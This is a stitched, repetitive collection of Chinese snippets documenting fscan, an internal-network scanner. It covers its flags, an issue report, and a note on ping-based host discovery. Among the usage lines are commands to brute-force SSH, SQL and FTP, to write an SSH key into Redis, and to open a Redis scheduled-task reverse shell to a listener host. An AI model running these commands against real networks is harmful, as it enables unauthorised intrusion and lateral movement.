fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量) fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描) fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描) fscan.exe -h 192.168.1.1/24 -rf id_...
一、简介一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。二、主要功能1.信息搜集:存活探测(icmp)端口扫描2.爆破功能:各类服务爆破(ssh、...
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描) fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥) fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell) fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成...
-np 跳过存活探测 -num int web poc 发包速率 (default 20) -o string 扫描结果保存到哪 (default "result.txt") -p string 设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017") -pa string ...
(default "all") -no 扫描结果不保存到文件中 -nobr 跳过sql、ftp、ssh等的密码爆破 -nopoc 跳过web poc扫描 -np 跳过存活探测 -num int web poc 发包速率 (default 20) -o string 扫描结果保存到哪 (default "result.txt") -p string 设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default "21,...
环境MAC(windows下正常) 辛苦作者大大 正常情况下: go run main.go -h 172.20.10.1/24 (Ping) Target '172.20.10.15' is alive (Ping) Target '172.20.10.1' is alive (Ping) Target '172.20.10.3' is alive icmp alive hosts len is: 3 172.20.10.1:21 open 在-np下扫描导
(default"all")-no 扫描结果不保存到文件中-nobr 跳过sql、ftp、ssh等的密码爆破-nopoc 跳过web poc扫描-np 跳过存活探测-num int web poc发包速率(default20)-o string扫描结果保存到哪(default"result.txt")-p string设置扫描的端口:22|1-65535|22,80,3306(default"21,22,80,81,135,139,443,445,1433...
txt -m string Select scan type ,as: -m ssh (default "all") -no not to save output log -nopoc not to scan web vul -np not to ping -o string Outputfile (default "result.txt") -p string Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,...
-hnstring扫描时,要跳过的ip: -hn192.168.1.1/24-mstring设置扫描模式: -mssh(default"all") -no 扫描结果不保存到文件中 -nobr 跳过sql、ftp、ssh等的密码爆破 -nopoc 跳过web poc扫描 -np 跳过存活探测 -numintweb poc 发包速率 (default20) ...
首先,如果没有使用 -np 参数,则先使用 ping 进行一个存活探测:这里的小问题就是,存活检测的方式少了,对于禁ping的主机,就无法使用,这也导致有时候用fscan扫描会发现扫不到东西,或者是扫的东西太少了,而如果使用了 -np 可是全面扫描,但是又会浪费很多时间,特别是A段,B段这种。